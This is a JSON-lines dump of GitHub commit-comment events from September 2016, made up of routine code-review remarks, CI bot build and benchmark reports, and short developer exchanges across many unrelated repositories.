{"id":"4538099372","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":18957645,"position":19,"line":19,"path":"js/script.js","commit_id":"874bd3854caeae9cc9e55fb7b73b18b5d1f524e7","created_at":"2016-09-09T04:34:51Z","updated_at":"2016-09-09T04:34:51Z","body":"Fantastic job going for the all the bonuses!"}},"created_at":"2016-09-09T04:34:51Z"}
{"id":"4538099826","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18957649,"position":null,"line":null,"path":null,"commit_id":"3e60f7c5e5e4fa2060b571463f12c6e0d01f0b70","created_at":"2016-09-09T04:35:06Z","updated_at":"2016-09-09T04:35:06Z","body":"'main.scss' isn't needed with the component based system we're using here, the only thing that would probably go into it is the 'html' and 'body' styles, and would probably just complicate the build process. 'Root' styles (like stuff for the body), should probably go into the section of App.vue, as it's the 'root' component."}},"created_at":"2016-09-09T04:35:06Z"}
{"id":"4538099848","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"momothereal/Pathfinder"},"payload":{"comment":{"id":18957650,"position":27,"line":56,"path":"src/main/java/ca/momoperes/pathfinder/PathNode.java","commit_id":"7d7a142139d7d94d7b11671b8c0bd0aeafbf6036","created_at":"2016-09-09T04:35:07Z","updated_at":"2016-09-09T04:35:07Z","body":"Why is `String.valueOf` being used here? `\"(\" + point.x + \")\"` seems good enough, or even `\"(\" + point.x.toString() + \")\"`."}},"created_at":"2016-09-09T04:35:07Z"}
{"id":"4538102845","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":18957655,"position":null,"line":null,"path":null,"commit_id":"874bd3854caeae9cc9e55fb7b73b18b5d1f524e7","created_at":"2016-09-09T04:36:21Z","updated_at":"2016-09-09T04:36:21Z","body":"Mary, you are doing incredibly well! I can not find any feedback to give for room to improve. Your code is very clean and you are executing all the concepts excellently. Keep up the great work!"}},"created_at":"2016-09-09T04:36:21Z"}
{"id":"4538106607","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18957662,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-09T04:38:07Z","updated_at":"2016-09-09T04:38:07Z","body":"develop (Unknown) - Win64-Windows-7-VisualStudio-12: OK (2407 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.33%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T04:38:07Z"}
{"id":"4538106683","type":"CommitCommentEvent","actor":{"login":"emilsoman"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":18957663,"position":5,"line":5,"path":"2016-09-09.md","commit_id":"cd4296a079c4fdcc21ce02c723d9e8afa24b489a","created_at":"2016-09-09T04:38:09Z","updated_at":"2016-09-09T04:38:09Z","body":"@HarshwardhanSingh This is a \"must\" in production apps. The idea is that a migration, if released into git origin and pulled by others, has to be treated as permanent, and cannot be changed. But as long as your change has not been published (only committed locally or used by only you) , you can keep updating the migration as you please."}},"created_at":"2016-09-09T04:38:09Z"}
{"id":"4538107019","type":"CommitCommentEvent","actor":{"login":"ByAriz"},"repo":{"name":"ByAriz/languages-android-app"},"payload":{"comment":{"id":18957664,"position":null,"line":null,"path":null,"commit_id":"11662b6c3b5c37aa6524e80cf4cb6f555287ebd0","created_at":"2016-09-09T04:38:17Z","updated_at":"2016-09-09T04:38:17Z","body":"Gvv"}},"created_at":"2016-09-09T04:38:17Z"}
{"id":"4538110605","type":"CommitCommentEvent","actor":{"login":"emilsoman"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":18957671,"position":11,"line":11,"path":"2016-09-09.md","commit_id":"cd4296a079c4fdcc21ce02c723d9e8afa24b489a","created_at":"2016-09-09T04:39:56Z","updated_at":"2016-09-09T04:39:56Z","body":"Keep in mind this may become redundant when writing front-end only code with webpack, but good practice while in Rails."}},"created_at":"2016-09-09T04:39:56Z"}
{"id":"4538111281","type":"CommitCommentEvent","actor":{"login":"amowu"},"repo":{"name":"Selz/plyr"},"payload":{"comment":{"id":18957673,"position":15,"line":891,"path":"src/js/plyr.js","commit_id":"46f82a4af375164355315f08b5724a25961aa39b","created_at":"2016-09-09T04:40:17Z","updated_at":"2016-09-09T04:40:17Z","body":"slide-speed -> slide-quality ?"}},"created_at":"2016-09-09T04:40:17Z"}
{"id":"4538113861","type":"CommitCommentEvent","actor":{"login":"SamPotts"},"repo":{"name":"Selz/plyr"},"payload":{"comment":{"id":18957676,"position":15,"line":891,"path":"src/js/plyr.js","commit_id":"46f82a4af375164355315f08b5724a25961aa39b","created_at":"2016-09-09T04:41:18Z","updated_at":"2016-09-09T04:41:18Z","body":"This is WIP (hence being in the develop branch). It's not production ready code :-) "}},"created_at":"2016-09-09T04:41:18Z"}
{"id":"4538114020","type":"CommitCommentEvent","actor":{"login":"emilsoman"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":18957677,"position":17,"line":17,"path":"2016-09-09.md","commit_id":"cd4296a079c4fdcc21ce02c723d9e8afa24b489a","created_at":"2016-09-09T04:41:23Z","updated_at":"2016-09-09T04:41:23Z","body":"Also worth mentioning in what scenarios a transaction gets rolled back,ie, what does the developer have to do to convert something non-transactional to transactional? Can you give an example?"}},"created_at":"2016-09-09T04:41:23Z"}
{"id":"4538116112","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957679,"position":35,"line":125,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T04:42:19Z","updated_at":"2016-09-09T04:42:19Z","body":"Suggest better, more descriptive names for variables. How about `root_schema`, `schema_list` makes it more clear what these are? "}},"created_at":"2016-09-09T04:42:19Z"}
{"id":"4538118464","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957689,"position":26,"line":116,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T04:43:31Z","updated_at":"2016-09-09T04:43:31Z","body":"This function is too big (~80 lines). Can this be split up into smaller functions to improve readability per the clean code guidelines?"}},"created_at":"2016-09-09T04:43:31Z"}
{"id":"4538118818","type":"CommitCommentEvent","actor":{"login":"netman2k"},"repo":{"name":"camptocamp/puppet-openldap"},"payload":{"comment":{"id":18957690,"position":138,"line":180,"path":"lib/puppet/provider/openldap_overlay/olc.rb","commit_id":"e34398869fb82710bf3e95e667f75e860fd58d7f","created_at":"2016-09-09T04:43:42Z","updated_at":"2016-09-09T04:43:42Z","body":"What's this variable, @property_has for?\r\nIs this a typo? am I right?"}},"created_at":"2016-09-09T04:43:42Z"}
{"id":"4538121198","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":18957697,"position":83,"line":93,"path":"Assignment/starter_code/js/index.js","commit_id":"16317159855d906a3e12b8f0858c990cccf05b0f","created_at":"2016-09-09T04:44:45Z","updated_at":"2016-09-09T04:44:45Z","body":"Nice job using multiline commenting!"}},"created_at":"2016-09-09T04:44:45Z"}
{"id":"4538121420","type":"CommitCommentEvent","actor":{"login":"hrj"},"repo":{"name":"oswetto/Loboevolution"},"payload":{"comment":{"id":18957699,"position":null,"line":null,"path":null,"commit_id":"22e640e0c4dcb0a91738521dc68a873685bcd804","created_at":"2016-09-09T04:44:51Z","updated_at":"2016-09-09T04:44:51Z","body":"When changing the license, you need approval from original copyright holders. I am just curious, did you manage to contact original Lobo Browser developers?"}},"created_at":"2016-09-09T04:44:51Z"}
{"id":"4538123147","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18957702,"position":null,"line":null,"path":null,"commit_id":"6f7ee0e5b6608b808ae181813d150ec77de23f9b","created_at":"2016-09-09T04:45:34Z","updated_at":"2016-09-09T04:45:34Z","body":"Thanks for your work. Btw level is actually an integer"}},"created_at":"2016-09-09T04:45:34Z"}
{"id":"4538123655","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":18957703,"position":47,"line":57,"path":"Assignment/starter_code/js/index.js","commit_id":"16317159855d906a3e12b8f0858c990cccf05b0f","created_at":"2016-09-09T04:45:48Z","updated_at":"2016-09-09T04:45:48Z","body":"Great job using console logs to check what is happening."}},"created_at":"2016-09-09T04:45:48Z"}
{"id":"4538128046","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":18957712,"position":9,"line":8,"path":"Assignment/starter_code/js/index.js","commit_id":"16317159855d906a3e12b8f0858c990cccf05b0f","created_at":"2016-09-09T04:47:52Z","updated_at":"2016-09-09T04:47:52Z","body":"It's great to see how you are thinking to make DRY and efficient code. Perhaps try something like this on refactoring the next assignment."}},"created_at":"2016-09-09T04:47:52Z"}
{"id":"4538128302","type":"CommitCommentEvent","actor":{"login":"MarsonShine"},"repo":{"name":"MarsonShine/MyStudy"},"payload":{"comment":{"id":18957713,"position":null,"line":null,"path":null,"commit_id":"3a47cf396111169658654abf3eefc7a4e6f45d32","created_at":"2016-09-09T04:47:59Z","updated_at":"2016-09-09T04:47:59Z","body":"+asp.net 文档地址：\r\n +https://docs.asp.net/en/latest/index.html\r\n +asp.net api document url:\r\n +https://docs.asp.net/projects/api/en/latest/"}},"created_at":"2016-09-09T04:47:59Z"}
{"id":"4538131613","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18957718,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-09T04:49:38Z","updated_at":"2016-09-09T04:49:38Z","body":"I changed to \"SYNCHRONOUS\" cause it depend on \"DelegatingMailboxListener\" at least"}},"created_at":"2016-09-09T04:49:38Z"}
{"id":"4538131616","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957719,"position":49,"line":139,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T04:49:38Z","updated_at":"2016-09-09T04:49:38Z","body":"Can this if condition be made into a function something like the below? This will make it clear what this check is, so that reader doesn't have to rely on comment to understand (code may change, but comment may not be updated, which will confuse readers)\r\n\r\n```\r\nbool keyword_is_leaf(std::string & keyword)\r\n{\r\n    if(keyword == \"leaf\" || keyword == \"leaf-list\" || keyword == \"anyxml\")\r\n        return true;\r\n\r\n    return false;\r\n}\r\n```"}},"created_at":"2016-09-09T04:49:38Z"}
{"id":"4538132476","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18957724,"position":null,"line":null,"path":null,"commit_id":"7997618f291effa5fef447312c53caa6759dae52","created_at":"2016-09-09T04:50:03Z","updated_at":"2016-09-09T04:50:03Z","body":"Okay so something strange happened, it seems the _first_ attack is ranged attack in disguise, only the second and beyond attack gets replaced. This didn't happen when I tested this, so I'm very confused.\r\n\r\nThe correct value is B8 09 52 00 00 5F (which is actually the one you posted first @Rydian just without the last byte) unless it actually changes\r\n\r\nNeed some testing here"}},"created_at":"2016-09-09T04:50:03Z"}
{"id":"4538133521","type":"CommitCommentEvent","actor":{"login":"pporada-gl"},"repo":{"name":"sstephenson/bats"},"payload":{"comment":{"id":18957726,"position":null,"line":null,"path":null,"commit_id":"03608115df2071fff4eaaff1605768c275e5f81f","created_at":"2016-09-09T04:50:31Z","updated_at":"2016-09-09T04:50:31Z","body":"Speaking of project maintainers, does this project need more maintainers?"}},"created_at":"2016-09-09T04:50:31Z"}
{"id":"4538136385","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957732,"position":44,"line":134,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T04:51:58Z","updated_at":"2016-09-09T04:51:58Z","body":"Since the function is returning on above error, is this `else` loop needed?"}},"created_at":"2016-09-09T04:51:58Z"}
{"id":"4538137809","type":"CommitCommentEvent","actor":{"login":"harikt"},"repo":{"name":"atlasphp/Atlas.Cli"},"payload":{"comment":{"id":18957737,"position":3,"line":194,"path":"src/Skeleton/Skeleton.php","commit_id":"acbdacb23af01778f4163d9c9f062394e5ce00ff","created_at":"2016-09-09T04:52:41Z","updated_at":"2016-09-09T04:52:41Z","body":"@jakejohns yes the comment was wrong. See https://github.com/atlasphp/Atlas.Cli/pull/9#issuecomment-213789933 "}},"created_at":"2016-09-09T04:52:41Z"}
{"id":"4538138063","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":18957739,"position":6,"line":139,"path":"python/gps/agent/ros/agent_ros.py","commit_id":"6d7b75face55c4845f46e0512008de07fb15d343","created_at":"2016-09-09T04:52:48Z","updated_at":"2016-09-09T04:52:48Z","body":"don't change this."}},"created_at":"2016-09-09T04:52:48Z"}
{"id":"4538138751","type":"CommitCommentEvent","actor":{"login":"ByAriz"},"repo":{"name":"ByAriz/languages-android-app"},"payload":{"comment":{"id":18957740,"position":null,"line":null,"path":null,"commit_id":"11662b6c3b5c37aa6524e80cf4cb6f555287ebd0","created_at":"2016-09-09T04:53:11Z","updated_at":"2016-09-09T04:53:11Z","body":"Рп"}},"created_at":"2016-09-09T04:53:11Z"}
{"id":"4538141518","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18957744,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-09T04:54:30Z","updated_at":"2016-09-09T04:54:30Z","body":"@dwradcliffe If the version of gem is yanked, users can not download it. So I think that users don't need SHA-256 in this case."}},"created_at":"2016-09-09T04:54:30Z"}
{"id":"4538143386","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"arubinofaux/discog-get"},"payload":{"comment":{"id":18957748,"position":5,"line":5,"path":"lib/disget.rb","commit_id":"158c8fe59bc867b39f0a962d89a411513e0e220c","created_at":"2016-09-09T04:55:24Z","updated_at":"2016-09-09T04:55:24Z","body":"typo in module name? maybe you wanted `Discoget`?"}},"created_at":"2016-09-09T04:55:24Z"}
{"id":"4538143665","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957750,"position":26,"line":50,"path":"sdk/cpp/ydk/src/entity_data_node_walker.hpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T04:55:32Z","updated_at":"2016-09-09T04:55:32Z","body":"Is spelled out variables (like `attributes`) better than abbreviating here for clarity/readability?"}},"created_at":"2016-09-09T04:55:32Z"}
{"id":"4538144295","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"arubinofaux/discog-get"},"payload":{"comment":{"id":18957752,"position":8,"line":8,"path":"exe/disget","commit_id":"158c8fe59bc867b39f0a962d89a411513e0e220c","created_at":"2016-09-09T04:55:53Z","updated_at":"2016-09-09T04:55:53Z","body":"ok, maybe not :)"}},"created_at":"2016-09-09T04:55:53Z"}
{"id":"4538145598","type":"CommitCommentEvent","actor":{"login":"3luesky"},"repo":{"name":"3luesky/3luesky.github.io"},"payload":{"comment":{"id":18957756,"position":null,"line":null,"path":null,"commit_id":"40e7b2593d7d089f612e5eabe7b1080f01673081","created_at":"2016-09-09T04:56:29Z","updated_at":"2016-09-09T04:56:29Z","body":"按时大大啊"}},"created_at":"2016-09-09T04:56:29Z"}
{"id":"4538149493","type":"CommitCommentEvent","actor":{"login":"x-huihui"},"repo":{"name":"x-huihui/x-huihui.github.io"},"payload":{"comment":{"id":18957763,"position":18,"line":18,"path":"index.html","commit_id":"d99018b792200d69d38625c6d709391b19573c2a","created_at":"2016-09-09T04:58:22Z","updated_at":"2016-09-09T04:58:22Z","body":"dfgsd "}},"created_at":"2016-09-09T04:58:22Z"}
{"id":"4538149833","type":"CommitCommentEvent","actor":{"login":"sleep-walker"},"repo":{"name":"openSUSE/aaa_base"},"payload":{"comment":{"id":18957764,"position":null,"line":null,"path":null,"commit_id":"3e1d5e06276606e056bd3a0a463a5ed9f16b6ffb","created_at":"2016-09-09T04:58:32Z","updated_at":"2016-09-09T04:58:32Z","body":"why don't you use directly\r\n```\r\nif \"$restricted\"\r\n```\r\ninstead of\r\n```\r\nif test \"$restricted\" = true\r\n```"}},"created_at":"2016-09-09T04:58:32Z"}
{"id":"4538152858","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":18957772,"position":320,"line":297,"path":"python/gps/algorithm/algorithm_mdgps.py","commit_id":"6d7b75face55c4845f46e0512008de07fb15d343","created_at":"2016-09-09T05:00:01Z","updated_at":"2016-09-09T05:00:01Z","body":"replace \"cs\" with \"prevcost_cs\" if ioc is on."}},"created_at":"2016-09-09T05:00:01Z"}
{"id":"4538162629","type":"CommitCommentEvent","actor":{"login":"Landrash"},"repo":{"name":"Landrash/pi-gen"},"payload":{"comment":{"id":18957785,"position":49,"line":70,"path":"README.md","commit_id":"275c29e66dedd74fe80debb8326362b4bac0fab5","created_at":"2016-09-09T05:04:10Z","updated_at":"2016-09-09T05:04:10Z","body":"Email isn't really a specific package or program. Wouldn't it be better to be more specific ?\r\nCould replace `email` with `claws-mail`."}},"created_at":"2016-09-09T05:04:10Z"}
{"id":"4538162774","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/hxcpp"},"payload":{"comment":{"id":18957786,"position":null,"line":null,"path":null,"commit_id":"743d83cf76f56d1a0bae7e898cbf0ee8a455dd26","created_at":"2016-09-09T05:04:14Z","updated_at":"2016-09-09T05:04:14Z","body":"Yes, I think on all systems or not at all is best.\r\nOn mac, you get much smaller stack-space on the non-main thread, so you would hit the problem more often - ran into this on the haxe serializer.\r\nSo I would do it unconditionally in project/libs.\r\nBut in src/hx/libs/regexp/Build.xml there are a few more options, since this is done per-project.\r\nWe could add it with ```unless=\"HXCPP_RECURSIVE_REGEXP\"``` which would allow developers to use a haxe define to turn this on if they need the speed, and know the risks."}},"created_at":"2016-09-09T05:04:14Z"}
{"id":"4538165922","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18957792,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-09T05:05:44Z","updated_at":"2016-09-09T05:05:44Z","body":"@TheDiamondYT1 Must you be so childish?"}},"created_at":"2016-09-09T05:05:44Z"}
{"id":"4538166188","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957794,"position":87,"line":177,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T05:05:52Z","updated_at":"2016-09-09T05:05:52Z","body":"These 4 lines are pretty similar to the 4 lines on line 161. They can be made into a separate function and called from both places to avoid duplication. Something like below?\r\n```\r\nvoid add_attribute_to_diagnostic_node(EntityDiagnostic & diagnostic,\r\n       std::string source_name, ydk::core::ValidationError validation_error)\r\n{\r\n    ydk::core::DiagnosticNode<std::string, ydk::core::ValidationError> attr{};\r\n    attr.source = key.arg;\r\n    attr.errors.push_back(ydk::core::ValidationError::MISSELEM);\r\n    diagnostic.attrs.push_back(std::move(attr));\r\n}\r\n```"}},"created_at":"2016-09-09T05:05:52Z"}
{"id":"4538167163","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957796,"position":84,"line":174,"path":"sdk/cpp/ydk/src/entity_data_node_walker.cpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T05:06:18Z","updated_at":"2016-09-09T05:06:18Z","body":"Would `leaf_schema_list` be a better name for clarity?"}},"created_at":"2016-09-09T05:06:18Z"}
{"id":"4538170493","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18957799,"position":46,"line":70,"path":"sdk/cpp/ydk/src/entity_data_node_walker.hpp","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T05:07:46Z","updated_at":"2016-09-09T05:07:46Z","body":"Should this `Service` be a `struct` instead of `class`?"}},"created_at":"2016-09-09T05:07:46Z"}
{"id":"4538182044","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18957834,"position":null,"line":null,"path":null,"commit_id":"e6848f3e3d7c707a78731cb1ae6d1f37a7204803","created_at":"2016-09-09T05:13:13Z","updated_at":"2016-09-09T05:13:13Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/e6848f3e3d7c707a78731cb1ae6d1f37a7204803#commitcomment-18957425) has completed - no performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/84c84032ea3ab9847061b4f7a5d28e6947ad466b/daily_2016_9_9/report.md). cc @jrevels"}},"created_at":"2016-09-09T05:13:13Z"}
{"id":"4538185341","type":"CommitCommentEvent","actor":{"login":"ulisesmx"},"repo":{"name":"wllmnc/hackerRank"},"payload":{"comment":{"id":18957837,"position":null,"line":null,"path":null,"commit_id":"8049b868e35d936446c0e0a4dbbc37fa66c099fb","created_at":"2016-09-09T05:14:40Z","updated_at":"2016-09-09T05:14:40Z","body":"from sets import Set\r\n\r\nfor _ in xrange(int(raw_input())):\r\n    print len(Set(list(raw_input())))"}},"created_at":"2016-09-09T05:14:40Z"}
{"id":"4538185886","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18957839,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T05:14:54Z","updated_at":"2016-09-09T05:14:54Z","body":"Hi Ivan, FYI this and a 2/3 density approach has already been tested wirhout success.."}},"created_at":"2016-09-09T05:14:54Z"}
{"id":"4538195094","type":"CommitCommentEvent","actor":{"login":"thp1997"},"repo":{"name":"ferhung-mtk/android_system_sepolicy"},"payload":{"comment":{"id":18957859,"position":null,"line":null,"path":null,"commit_id":"7f04f14ea5ec8daace2ac9c405e8b3bd5a23b3ca","created_at":"2016-09-09T05:19:12Z","updated_at":"2016-09-09T05:19:12Z","body":"ohh , then we have chance to boot on prebuilt kernel. I think."}},"created_at":"2016-09-09T05:19:12Z"}
{"id":"4538196831","type":"CommitCommentEvent","actor":{"login":"kharidiron"},"repo":{"name":"kharidiron/StarryPy3k"},"payload":{"comment":{"id":18957864,"position":null,"line":null,"path":null,"commit_id":"420c5cc2ed2e988a2295efa2059d1c6c5920da98","created_at":"2016-09-09T05:20:08Z","updated_at":"2016-09-09T05:20:08Z","body":"Should _hopefully_ fix #47."}},"created_at":"2016-09-09T05:20:08Z"}
{"id":"4538198524","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":18957868,"position":null,"line":null,"path":null,"commit_id":"48677345281a93d8829dd37d0480a6062945416a","created_at":"2016-09-09T05:20:49Z","updated_at":"2016-09-09T05:20:49Z","body":"^ I did it as [a pull request](https://github.com/behdad/harfbuzz/pull/315/), I'd guess"}},"created_at":"2016-09-09T05:20:49Z"}
{"id":"4538202883","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18957872,"position":null,"line":null,"path":null,"commit_id":"753b12f886bd34907c6ba2465486b52eba1e4865","created_at":"2016-09-09T05:22:46Z","updated_at":"2016-09-09T05:22:46Z","body":":+1: "}},"created_at":"2016-09-09T05:22:46Z"}
{"id":"4538208249","type":"CommitCommentEvent","actor":{"login":"brainyfarm"},"repo":{"name":"tshuwari/freecodecamp-algorithms"},"payload":{"comment":{"id":18957888,"position":null,"line":null,"path":null,"commit_id":"9cc22f0060b61be8b0ae5c741cda66b4e1b0b809","created_at":"2016-09-09T05:25:13Z","updated_at":"2016-09-09T05:25:13Z","body":"Good stuff @tshuwari\r\n\r\nI think you can improve on line 9, excessive white spaces and variable naming could be better since you aren't just checking but cleaning the string. \r\n\r\nSame goes for your `joinedString` variable name as well as your comment on line number 14. "}},"created_at":"2016-09-09T05:25:13Z"}
{"id":"4538208613","type":"CommitCommentEvent","actor":{"login":"darkevilmac"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18957889,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-09T05:25:20Z","updated_at":"2016-09-09T05:25:20Z","body":"I don't see this being changed back so I won't bother going over it again, if I could suggest a name for feedback on I'd personally prefer 'quantity' instead of 'amount'."}},"created_at":"2016-09-09T05:25:20Z"}
{"id":"4538209762","type":"CommitCommentEvent","actor":{"login":"GoldenJoe"},"repo":{"name":"calmcom/AlamofireImage"},"payload":{"comment":{"id":18957891,"position":null,"line":null,"path":null,"commit_id":"0469d9ebab544478ba6644a9881aba3833ce1a86","created_at":"2016-09-09T05:25:50Z","updated_at":"2016-09-09T05:25:50Z","body":"Downloaded this branch, but I'm not sure what to put for the encoding: parameter.\r\n\r\nAlamofire.request(\"www.myurl.com\", method: .post, parameters: params, encoding: ???, headers: nil)"}},"created_at":"2016-09-09T05:25:50Z"}
{"id":"4538213414","type":"CommitCommentEvent","actor":{"login":"ianchute"},"repo":{"name":"ianchute/StockCache"},"payload":{"comment":{"id":18957894,"position":null,"line":null,"path":null,"commit_id":"d9578d677e3baf620cd7a4c95feb9ccbcca0892e","created_at":"2016-09-09T05:27:28Z","updated_at":"2016-09-09T05:27:28Z","body":"Hey man, I'm sorry for not replying for a long time.\r\nI sent you a message in Upwork"}},"created_at":"2016-09-09T05:27:28Z"}
{"id":"4538215485","type":"CommitCommentEvent","actor":{"login":"AnonymousRandomPerson"},"repo":{"name":"Pixelmon/Pixelmon-Language"},"payload":{"comment":{"id":18957895,"position":null,"line":null,"path":null,"commit_id":"f46da7dfb74953ee81b956426ad5fc23e766aa1e","created_at":"2016-09-09T05:28:23Z","updated_at":"2016-09-09T05:28:23Z","body":"The developer in charge of merging pull requests is on vacation for a few days, so your changes will be merged once he returns. In the meantime, if you want to keep looking for strings that are too long, we'd certainly appreciate it."}},"created_at":"2016-09-09T05:28:23Z"}
{"id":"4538216484","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Warlockbugs/mangos-tbc"},"payload":{"comment":{"id":18957896,"position":null,"line":null,"path":null,"commit_id":"75cfcbce4df42d338991e41932a2d755d6e7f0f8","created_at":"2016-09-09T05:28:49Z","updated_at":"2016-09-09T05:28:49Z","body":"Congratz for your first push its only the start of alot of fun :)\r\n:+1: "}},"created_at":"2016-09-09T05:28:49Z"}
{"id":"4538218785","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":18957899,"position":null,"line":null,"path":null,"commit_id":"b430c15a6c3f7afe2321a4a82a36b1c6a0e46240","created_at":"2016-09-09T05:29:49Z","updated_at":"2016-09-09T05:29:49Z","body":"This breaks the `when` test, which relies on `when` terminating a diversion."}},"created_at":"2016-09-09T05:29:49Z"}
{"id":"4538219607","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18957901,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T05:30:11Z","updated_at":"2016-09-09T05:30:11Z","body":"> こちら、ご指摘ありがとうございます。\r\n「PDO SQLインジェクション」に関して再度調べてみました。\r\n1.文字エンコーディングを指定する\r\n2.静的プレースホルダを用いる\r\n3.バインド時に型を指定する\r\n元のコードはこちらの考えに従って書かれていた形ですね。\r\n私も再度書きなおしてプッシュしました。\r\n\r\nご理解されている通りでばっちりです！コード確認しますね！"}},"created_at":"2016-09-09T05:30:11Z"}
